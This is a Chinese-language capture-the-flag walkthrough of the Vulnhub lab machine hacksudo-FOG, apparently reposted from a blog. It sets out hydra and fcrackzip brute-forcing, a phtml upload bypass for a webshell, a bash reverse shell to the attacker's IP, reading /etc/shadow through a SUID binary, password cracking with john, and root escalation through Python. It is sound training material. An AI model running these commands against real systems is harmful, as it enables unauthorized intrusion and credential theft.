Vulnhub靶机：hacksudo-FOG

一、介绍

运行环境：Virtualbox

攻击机：kali（10.0.2.15）

靶机：hacksudo-FOG（10.0.2.48）

目标：获取靶机root权限和flag

靶机下载地址：https://www.vulnhub.com/entry/hacksudo-fog,697/

二、信息收集

使用nmap主机发现靶机ip：10.0.2.48

在这里插入图片描述

使用nmap端口扫描发现，靶机开放端口：21、22、80、111、443、2049、3306

在这里插入图片描述

80端口：打开网站发现网站页面下面漂浮着一个链接，点击链接网站跳转到另一个页面

在这里插入图片描述

该页面没有什么可利用的功能点，查看源码发现隐藏信息，一个提取音频文件隐藏信息的工具和容器的作者，可能存在用户名：hacksudo

caesar-cipher ==? https://github.com/hacksudo/SoundStegno
box author : hacksudo

在这里插入图片描述

使用gobuster对网站进行目录爆破

gobuster dir -u http://10.0.2.48 -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述

尝试使用dirbuster进行目录爆破，补充信息

在这里插入图片描述

综合上面的扫描结果

/dict.txt #字典文件

/cms/ #一个CMS Made Simple搭建的网站

/cms/admin/login.php #网站的登录界面

在这里插入图片描述

打开CMS Made Simple搭建的网站可以看到版本信息V2.2.5

在这里插入图片描述

三、漏洞利用

可以使用searchsploit命令搜索该cms的历史漏洞

searchsploit CMS Made Simple

在这里插入图片描述

发现存在命令执行漏洞，但要利用该漏洞需要知道用户名密码

可以尝试使用用户名hacksudo和之前目录爆破得到的字典对登陆界面进行爆破

在这里插入图片描述

爆破完成，未发现可用的用户名密码

根据nmap扫描结果，靶机还开放了21、22、3306端口，可以尝试对这些端口进行爆破

hydra -l hacksudo -P passwd.txt 10.0.2.48 ftp -t 64

在这里插入图片描述

爆破ftp成功，得到用户名密码：hacksudo/hackme

在这里插入图片描述

登录ftp发现里面存在一些文件，存在一个压缩文件和flag1.txt

查看flag1.txt

在这里插入图片描述

打开压缩文件发现被加密了，使用fcrackzip进行暴力破解，得到密码：fooled

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u secr3tSteg.zip

在这里插入图片描述

解压压缩文件，发现一个wav音频文件

在这里插入图片描述

使用之前提示的工具，提取音频文件的隐藏信息

git clone https://github.com/hacksudo/SoundStegno
cd SoundStegno
python ExWave.py -f ../hacksudoSTEGNO.wav

Shift by 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR

在这里插入图片描述

提取出来的隐藏信息乱码，可能被加密了，使用凯撒密码解密，当偏移量为3时，解密成功

在这里插入图片描述

Pefcq yv 3
XYZABCDEFGHIJKLMNOPQRSTUVW
ABCDEFGHIJKLMNOPQRSTUVWXYZ
wwww.localhost/fog Username=fog:password=hacksudoISRO

使用得到的用户名密码登录网站，登录成功

在这里插入图片描述

发现文件上传功能，但直接上传php文件上传不上去，可以上传phtml文件绕过，上传一句话木马，使用蚁剑连接

在这里插入图片描述

连接成功

在这里插入图片描述

反弹shell

bash -c 'bash -i >& /dev/tcp/10.0.2.15/4444 0>&1'

在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

查看一下具有SUID权限的二进制可执行文件，发现look命令

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

搜索使用方法：look | GTFOBins

查看/etc/shadow文件内容

/usr/bin/look '' /etc/shadow

在这里插入图片描述

获得root用户和isro用户的加密的密码，可以将这些密码复制到主机，使用john工具进行暴力破解

john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt

在这里插入图片描述

爆破暂时只得到isro用户的密码：qwerty，如果密码字典足够强大可以直接得到root权限

切换为isro用户

在这里插入图片描述

查看具有sudo权限的程序，发现可以以root权限运行ls查看/home/isro/*文件夹下的文件

在这里插入图片描述

查看/home/isro/目录有什么可利用的文件，发现一个flag

在这里插入图片描述

在/home/isro/fog文件夹下存在一个fog程序

在这里插入图片描述

我们直接运行看看，发现是python程序，查看运行python程序的权限，发现是root权限

import os
os.system('id')

在这里插入图片描述

使用python提权

import os
os.system("/bin/sh")

在这里插入图片描述

获取flag

在这里插入图片描述

参考链接：Vulnhub 靶场 HACKSUDO: FOG - sainet - 博客园 (cnblogs.com)

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://xiahunao.cn/news/2775294.html

如若内容造成侵权/违法违规/事实不符，请联系瞎胡闹网进行投诉反馈，一经查实，立即删除！